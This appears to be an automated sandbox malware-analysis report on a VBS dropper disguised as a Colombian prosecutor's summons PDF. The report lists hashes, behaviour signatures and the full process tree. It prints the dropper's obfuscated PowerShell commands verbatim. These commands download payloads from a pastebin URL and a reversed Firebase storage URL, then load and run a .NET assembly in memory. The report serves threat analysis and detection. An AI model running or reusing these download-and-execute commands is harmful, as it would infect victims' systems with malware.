Overview

overview

10

Static

static

1

Informacio...DF.vbs

windows7-x64

10

Informacio...DF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 17:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Informacion detallada proceso de citacion fiscalia No Radicado#2024-996569-66332368-999650023-PDF.vbs

  • Size

    207KB

  • MD5

    3a463161808ec6ca767d6f33717b6d09

  • SHA1

    dfce6272aca63db2237c10b8dfc1f049bd2a69da

  • SHA256

    3b2f343d09a33b6f15664c3c7cab05b149470aa2c1320784326b03eb66b5aa61

  • SHA512

    24d960b49be770f85ecac0bd7c53f7963d05317de23c3c4c0a722a644e1a3642f618956f46858a7e2fda6f2996bee0bbc5ac97c552e8269dab3c822ee52ca52f

  • SSDEEP

    384:233333333333333333333333333333333333333333333333333333333333333q:WlzLjW

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pastebin.com/raw/0FK5ax2D

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion detallada proceso de citacion fiscalia No Radicado#2024-996569-66332368-999650023-PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★EM★QwBS★Gg★bQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★M★BG★Es★NQBh★Hg★MgBE★Cc★I★★7★CQ★Zg★g★D0★I★★o★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★I★★7★Ek★bgB2★G8★awBl★C0★VwBl★GI★UgBl★HE★dQBl★HM★d★★g★C0★VQBS★Ek★I★★k★EM★QwBS★Gg★bQ★g★C0★TwB1★HQ★RgBp★Gw★ZQ★g★CQ★Zg★g★C0★VQBz★GU★QgBh★HM★aQBj★F★★YQBy★HM★aQBu★Gc★I★★7★GM★bQBk★C4★ZQB4★GU★I★★v★GM★I★★7★H★★aQBu★Gc★I★★x★DI★Nw★u★D★★Lg★w★C4★MQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★u★GU★e★Bl★C★★LQBj★G8★bQBt★GE★bgBk★C★★ew★k★GY★I★★9★C★★K★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★SQBu★HY★bwBr★GU★LQBX★GU★YgBS★GU★cQB1★GU★cwB0★C★★LQBV★FI★SQ★g★CQ★UQBQ★HQ★YQB2★C★★LQBP★HU★d★BG★Gk★b★Bl★C★★J★Bm★C★★LQBV★HM★ZQBC★GE★cwBp★GM★U★Bh★HI★cwBp★G4★ZwB9★C★★Ow★k★FE★U★B0★GE★dg★g★D0★I★★o★C★★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★J★Bm★C★★KQ★g★Ds★J★B1★GU★YQB1★Gs★I★★9★C★★Jw★w★Cc★I★★7★CQ★awBz★Gg★b★Bo★C★★PQ★g★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★C★★OwBb★EI★eQB0★GU★WwBd★F0★I★★k★HE★Z★Bx★HI★dg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★FE★U★B0★GE★dg★u★HI★ZQBw★Gw★YQBj★GU★K★★n★CQ★J★★n★Cw★JwBB★Cc★KQ★g★Ck★I★★7★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★OgBD★HU★cgBy★GU★bgB0★EQ★bwBt★GE★aQBu★C4★T★Bv★GE★Z★★o★CQ★cQBk★HE★cgB2★Ck★LgBH★GU★d★BU★Hk★c★Bl★Cg★JwBU★GU★a★B1★Gw★YwBo★GU★cwBY★Hg★W★B4★Hg★LgBD★Gw★YQBz★HM★MQ★n★Ck★LgBH★GU★d★BN★GU★d★Bo★G8★Z★★o★Cc★TQBz★HE★QgBJ★GI★WQ★n★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★CQ★bgB1★Gw★b★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★Jw★0★GU★NgBm★D★★O★★5★GI★Zg★1★GE★M★★t★Dc★O★Bi★GE★LQBh★GM★Yw★0★C0★YQ★3★Dc★Yw★t★DI★N★Bl★GM★M★Bk★DI★Mg★9★G4★ZQBr★G8★d★★m★GE★aQBk★GU★bQ★9★HQ★b★Bh★D8★d★B4★HQ★LgB6★Ho★egB6★Ho★egB6★EY★Mg★l★FM★RQBO★E8★SQBD★EE★V★BJ★EM★M★★y★CU★UwBB★Ek★T★BB★EM★UwBJ★EY★LwBv★C8★bQBv★GM★LgB0★G8★c★Bz★H★★c★Bh★C4★YQ★4★DE★Mw★x★C0★YQBh★HM★bwBv★G8★cgBy★HI★cg★v★GI★Lw★w★HY★LwBt★G8★Yw★u★HM★aQBw★GE★ZQBs★Gc★bwBv★Gc★LgBl★Gc★YQBy★G8★d★Bz★GU★cwBh★GI★ZQBy★Gk★Zg★v★C8★OgBz★H★★d★B0★Gg★Jw★g★Cw★I★★k★Gs★cwBo★Gw★a★★g★Cw★I★★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★L★★g★CQ★dQBl★GE★dQBr★Cw★I★★n★DE★Jw★s★C★★JwBS★G8★Z★Bh★Cc★I★★p★Ck★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\Informacion detallada proceso de citacion fiscalia No Radicado#2024-996569-66332368-999650023-PDF.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/0FK5ax2D' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$ueauk = '0' ;$kshlh = 'C:\Users\Admin\AppData\Local\Temp\Informacion detallada proceso de citacion fiscalia No Radicado#2024-996569-66332368-999650023-PDF.vbs' ;[Byte[]] $qdqrv = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($qdqrv).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('4e6f089bf5a0-78ba-acc4-a77c-24ec0d22=nekot&aidem=tla?txt.zzzzzzzF2%SENOICATIC02%SAILACSIF/o/moc.topsppa.a8131-aasooorrrr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $kshlh , '____________________________________________-------', $ueauk, '1', 'Roda' ));"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2828
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2856
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      3999065339d4212ec47d44f057aba717

      SHA1

      831a064566e5350f66ab0ce59bdc5af307d5d66a

      SHA256

      da511f5f15e4325abc5d3950c9bc2e1a3ddfa8d77f1011bd421f79c7af4aacbb

      SHA512

      f8c929e9f444b839538c8d1f3748410f3279091f48549765f8ac9fe9122e6d2c3e853ecb6256e807ac6b3ff4104f8deaa998bb67ea87b6cfd9879e5567e828b5

      Download Submit

    • memory/1992-4-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1992-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1992-7-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1992-8-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1992-6-0x00000000023C0000-0x00000000023C8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1992-10-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1992-9-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1992-11-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1992-22-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

      Filesize

      9.6MB

      Download